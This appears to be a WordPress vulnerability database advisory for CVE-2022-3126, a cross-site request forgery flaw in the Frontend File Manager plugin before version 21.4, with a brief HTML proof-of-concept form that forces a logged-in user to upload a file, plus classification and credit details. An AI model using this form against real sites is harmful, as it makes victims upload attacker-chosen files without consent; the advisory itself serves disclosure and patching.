WordPress Plugin Vulnerabilities

Frontend File Manager < 21.4 - File Upload via CSRF

Description

The plugin does not have CSRF check when uploading files, which could allow attackers to make logged in users upload files on their behalf

Proof of Concept

<form action="https://example.com.com/wp-admin/admin-ajax.php?action=wpfm_upload_file" method="POST" enctype="multipart/form-data">
    <input type="file" name="file" value="">
    <input type="text" name="_file" value="payload.pdf">
    <input type="submit" name="submit" value="submit">
</form>

The file won't show up via the frontend/backend, but will be uploaded in the user folder (ie in wp-content/uploads/user_uploads/<usernname>/payload.pdf)

Affects Plugins

Plugin icon
nmedia-user-file-uploader
Fixed in 21.4

References

CVE
CVE-2022-3126

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
4.3 (medium)

Miscellaneous

Original Researcher
Raad Haddad of Cloudyrion GmbH
Submitter
Raad Haddad of Cloudyrion GmbH
Submitter twitter
raadfhaddad
Verified
Yes
WPVDB ID
7db363bf-7bef-4d47-9963-c30d6fdd2fb8

Timeline

Publicly Published
2022-09-26 (about 1 years ago)
Added
2022-09-26 (about 1 years ago)
Last Updated
2022-09-26 (about 1 years ago)

Other

Published
Title
Published
2023-10-03
Title
Social Proof Testimonials and Reviews by Repuso < 5.02 - CSRF
Published
2024-04-08
Title
Benchmark Email Lite < 4.2 - Cross-Site Request Forgery via page_settings()
Published
2023-11-28
Title
Business Directory Plugin < 6.3.11 - Cross-Site Request Forgery
Published
2023-09-04
Title
All in One B2B for WooCommerce <= 1.0.3 - Multiple CSRF
Published
2024-05-06
Title
hostel < 1.1.5.4 - Cross-Site Request Forgery